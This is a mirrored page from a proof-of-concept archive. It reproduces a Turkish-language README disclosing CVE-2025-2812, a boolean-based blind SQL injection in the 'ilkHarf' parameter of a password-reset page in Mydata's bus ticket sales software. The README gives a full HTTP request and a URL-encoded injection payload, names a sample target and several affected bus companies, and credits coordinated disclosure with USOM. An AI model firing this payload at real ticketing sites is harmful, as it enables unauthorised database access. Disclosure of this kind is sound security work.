Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-2812 PoC — SQLi in Mydata Informatics' Ticket Sales Automation

Source
Associated Vulnerability
Title:SQLi in Mydata Informatics' Ticket Sales Automation (CVE-2025-2812)
Description:Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mydata Informatics Ticket Sales Automation allows Blind SQL Injection.This issue affects Ticket Sales Automation: before 03.04.2025 (DD.MM.YYYY).
Description
CVE-2025-2812 SQL Injection
Readme

# CVE-2025-2812 — SQL Injection Vulnerability in "Bilet Satış Otomasyonu" by Mydata Bilişim Ltd. Şti

> 📌 **CVE-ID:** [CVE-2025-2812](https://www.cve.org/cverecord?id=CVE-2025-2812)  
> 📢 **USOM Duyurusu:** [tr-25-0099](https://www.usom.gov.tr/bildirim/tr-25-0099)  
> 🛡️ **Zafiyet Tipi:** CWE-89 - SQL Injection (Boolean-based Blind)  
> 🏢 **Etkilenen Ürün:** Bilet Satış Otomasyonu – Mydata Bilişim Ltd. Şti  
> 🌐 **Örnek Hedef URL:** `https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php`  

---

## 🔍 Zafiyet Özeti

"Bilet Satış Otomasyonu" ürününde, şifre sıfırlama (SifremiUnuttum.php) sayfasındaki `"Adınızın ilk harfi"` (ilkHarf) parametresinde **Boolean-based Blind SQL Injection** zafiyeti tespit edilmiştir. Bu zafiyet, kullanıcı adı ya da parola olmadan sistemden veri sızdırılmasına imkân tanımaktadır.

Bu zafiyet, aşağıdaki otobüs firmalarının sistemlerini kapsıyor:
- Balıkesir Uludağ
- Kontur
- Efe Tur
- Kale Seyahat
- +20 firma
---

## 💥 PoC (Proof of Concept)

### 📌 HTTP Request:

```http
GET /otobus-bileti/SifremiUnuttumBilgi.php?TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW HTTP/1.1
Host: otobusfirmasi.com.tr
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
Cookie: PHPSESSID=***************
````

### 🧪 Kullanılan Payload:

```text
TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW
```

---

## 🧠 Teknik Detaylar

* **Zafiyetli Parametre:** `ilkHarf`
* **Yöntem:** Boolean-based Blind SQLi
* **Zafiyet Türü:** Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

---

## 🙏 Teşekkür

"Mydata Bilişim Ltd. Şti" tarafından geliştirilen "Bilet Satış Otomasyonu" ürününde tespit ettiğimiz zafiyet sonrası, CVE-2025-2812 koduyla duyurulan bu açık, üretici ve [USOM](https://www.usom.gov.tr) koordinasyonuyla ilan edilmiştir.
Bu süreçte siber güvenlik topluluğuna katkı sunmaktan gurur duyarız.

Zafiyetin bildirilmesini takiben, Mydata Bilişim Ltd. Şti gerekli tüm prosedürleri hızlıca uygulamış, ilgili güvenlik açığını kapatarak sistemlerine ek güvenlik önlemleri entegre etmiştir. Sürece gösterdikleri şeffaflık, iş birliği ve sorumluluk bilinci için kendilerine teşekkür ederiz.

Bu süreçte siber güvenlik topluluğuna katkı sunmaktan gurur duyarız.

---

## 📬 İletişim

Her türlü soru, geri bildirim ya da iş birliği için benimle iletişime geçebilirsiniz:

- 📧 E-posta: [hasanyasinyasar@gmail.com](mailto:hasanyasinyasar@gmail.com)  
- 📷 Instagram: [@yyasar.yasin](https://www.instagram.com/yyasar.yasin)

---
File Snapshot

[4.0K] /data/pocs/db575eac1a1f834d77eed65f4fa232193257ecbd └── [3.0K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →